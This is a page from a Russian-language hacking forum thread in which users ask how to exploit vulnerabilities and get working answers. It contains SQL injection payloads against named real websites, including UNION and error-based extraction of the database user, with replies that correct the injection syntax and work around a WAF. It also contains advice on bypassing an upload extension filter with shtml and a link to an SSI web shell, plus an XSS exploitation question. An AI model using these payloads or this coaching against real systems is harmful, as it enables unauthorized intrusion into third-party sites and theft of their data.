HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2237 из 2438 « Первая < 12371737213721872227 2233 2234 2235 2236 2237 2238 2239 2240 2241 224722872337 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #22361  
Старый 21.04.2013, 22:11
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от justonline  
justonline said:
злей shtml
php не выполняет
 
Ответить с цитированием

  #22362  
Старый 21.04.2013, 22:11
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
Такой вопосец
.htaccess не пропускает файлы с таким разширением
(tpl\.html|php|php3|php4|php5|phtml|pl|cgi)
мб есть какиенибуть разширения исполняющие php код?
shtml, py

Цитата:
Сообщение от qaz  
qaz said:
php не выполняет
http://ahack.ru/releases/ssi-web-shell.htm
 
Ответить с цитированием

  #22363  
Старый 21.04.2013, 22:27
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от Always  
Always said:
http://odnadoma.ru/?part_id=500 ORDER BY 10 -- TRUE
http://odnadoma.ru/?part_id=500 ORDER BY 1 -- FALSE
http://odnadoma.ru/?part_id=500 UNION SELECT 1 -- ОТСОС
В ЧЕМ ПРОБЛЕМА?
Просто нет вывода

http://odnadoma.ru/?part_id=500+and+1=2+union+select+unhex(hex(123))+--+

UPD. Тут WAF прикольный кстати )

Фильтруются запятые, учти это.
 
Ответить с цитированием

  #22364  
Старый 22.04.2013, 03:53
exstreme
Guest
Сообщений: n/a
Провел на форуме:
3581

Репутация: 0
По умолчанию
Можно как-то раскрутить такую XSS

Код:
Code:
…
В XSSHERE можно вставлять код, "/{} экранируется, ();' не экранируется.
 
Ответить с цитированием

  #22365  
Старый 23.04.2013, 02:53
semolod91
Guest
Сообщений: n/a
Провел на форуме:
1549

Репутация: -10
По умолчанию
нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.

сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?

пс. как найти уязвимость в программном коде?
 
Ответить с цитированием

  #22366  
Старый 23.04.2013, 05:56
herfleisch
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649

Репутация: 97
Отправить сообщение для herfleisch с помощью ICQ
По умолчанию
Цитата:
Сообщение от semolod91  
semolod91 said:
нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.
сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?
пс. как найти уязвимость в программном коде?
Линки в студию.
 
Ответить с цитированием

  #22367  
Старый 23.04.2013, 11:23
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию
Разобрался
 
Ответить с цитированием

  #22368  
Старый 23.04.2013, 14:26
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию
Есть уязвимость типа

blog.php?id=1+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(user(), 1, 63), FLOOR(RAND(0)*2))) --

ответ:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 6

нет вывода user(), что делать?

Как раскрутить?
 
Ответить с цитированием

  #22369  
Старый 23.04.2013, 14:52
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от Sanic1977  
Sanic1977 said:
Есть уязвимость типа
blog.php?id=1+union+select+1,user()+--+
ответ:
SELECT ... FROM utils.post WHERE 1=1 AND id IN (1 union select 1) ORDER BY date DESC - mysql problem - conn id : Resource id #44
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1) ORDER BY date DESC' at line 6
Как раскрутить?
blog.php?id=1)+union+select+1,user()+--+
 
Ответить с цитированием

  #22370  
Старый 23.04.2013, 15:32
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию
Спасибо, за помощь

Пишу в уязвимости:

blog.php?id=25628)and(select 1 from(select count(*),concat(concat(user()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) --

ответ:

Every derived table must have its own alias

что это может быть?

как раскрутить?
 
Ответить с цитированием
Ответ
Страница 2237 из 2438 « Первая < 12371737213721872227 2233 2234 2235 2236 2237 2238 2239 2240 2241 224722872337 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ